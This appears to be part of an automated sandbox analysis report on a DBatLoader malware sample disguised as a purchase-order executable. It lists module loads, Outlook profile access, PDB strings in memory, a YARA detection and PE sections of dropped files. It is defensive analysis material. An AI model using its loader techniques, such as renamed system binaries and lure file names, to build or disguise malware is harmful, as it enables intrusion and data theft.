                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeStatic file information: File size 1264128 > 1048576
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: ymafvvdS.pif, 00000009.00000003.1580591877.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdb source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVClient.pdb source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdb source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdb source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: ymafvvdS.pif, 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: MsSense.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: MsSense.pdb source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D10000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.00000000024F6000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdb source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: locator.pdb source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1559563944.0000000005730000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000002.1647022839.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: easinvoker.pdbH source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2219413171.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: ymafvvdS.pif, 00000009.00000003.2199797397.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVClient.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdb source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdbX source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 0.2.PURCHASE REQUIRED DETAILS 000487958790903403.exe.2b10000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: ymafvvdS.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B2894C
                  Source: alpha.pif.5.drStatic PE information: section name: .didat
                  Source: OfficeC2RClient.exe.9.drStatic PE information: section name: .didat
                  Source: OfficeC2RClient.exe.9.drStatic PE information: section name: .detourc
                  Source: officesvcmgr.exe.9.drStatic PE information: section name: .didat
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: .00cfg
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: .gxfg
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: .retplne
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: LZMADEC
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: _RDATA
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: section name: malloc_h
                  Source: chrmstp.exe.9.drStatic PE information: section name: .00cfg
                  Source: chrmstp.exe.9.drStatic PE information: section name: .gxfg
                  Source: chrmstp.exe.9.drStatic PE information: section name: .retplne
                  Source: chrmstp.exe.9.drStatic PE information: section name: CPADinfo
                  Source: chrmstp.exe.9.drStatic PE information: section name: LZMADEC
                  Source: chrmstp.exe.9.drStatic PE information: section name: _RDATA
                  Source: chrmstp.exe.9.drStatic PE information: section name: malloc_h
                  Source: setup.exe.9.drStatic PE information: section name: .00cfg
                  Source: setup.exe.9.drStatic PE information: section name: .gxfg
                  Source: setup.exe.9.drStatic PE information: section name: .retplne
                  Source: setup.exe.9.drStatic PE information: section name: CPADinfo
                  Source: setup.exe.9.drStatic PE information: section name: LZMADEC
                  Source: setup.exe.9.drStatic PE information: section name: _RDATA
                  Source: setup.exe.9.drStatic PE information: section name: malloc_h
                  Source: notification_helper.exe.9.drStatic PE information: section name: .00cfg
                  Source: notification_helper.exe.9.drStatic PE information: section name: .gxfg
                  Source: notification_helper.exe.9.drStatic PE information: section name: .retplne
                  Source: notification_helper.exe.9.drStatic PE information: section name: CPADinfo
                  Source: notification_helper.exe.9.drStatic PE information: section name: _RDATA
                  Source: notification_helper.exe.9.drStatic PE information: section name: malloc_h
                  Source: chrome_proxy.exe.9.drStatic PE information: section name: .00cfg
                  Source: chrome_proxy.exe.9.drStatic PE information: section name: .gxfg
                  Source: chrome_proxy.exe.9.drStatic PE information: section name: .retplne
                  Source: chrome_proxy.exe.9.drStatic PE information: section name: _RDATA
                  Source: chrome_proxy.exe.9.drStatic PE information: section name: malloc_h
                  Source: crashreporter.exe.9.drStatic PE information: section name: .00cfg
                  Source: crashreporter.exe.9.drStatic PE information: section name: .voltbl
                  Source: default-browser-agent.exe.9.drStatic PE information: section name: .00cfg
                  Source: default-browser-agent.exe.9.drStatic PE information: section name: .voltbl
                  Source: firefox.exe.9.drStatic PE information: section name: .00cfg
                  Source: firefox.exe.9.drStatic PE information: section name: .freestd
                  Source: firefox.exe.9.drStatic PE information: section name: .retplne
                  Source: firefox.exe.9.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.9.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe.9.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.9.drStatic PE information: section name: _RDATA
                  Source: armsvc.exe.9.drStatic PE information: section name: .didat
                  Source: alg.exe.9.drStatic PE information: section name: .didat
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: .gehcont
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: section name: _RDATA
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: section name: .gxfg
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: section name: .gehcont
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: section name: .retplne
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: section name: .retplne
                  Source: FXSSVC.exe.9.drStatic PE information: section name: .didat
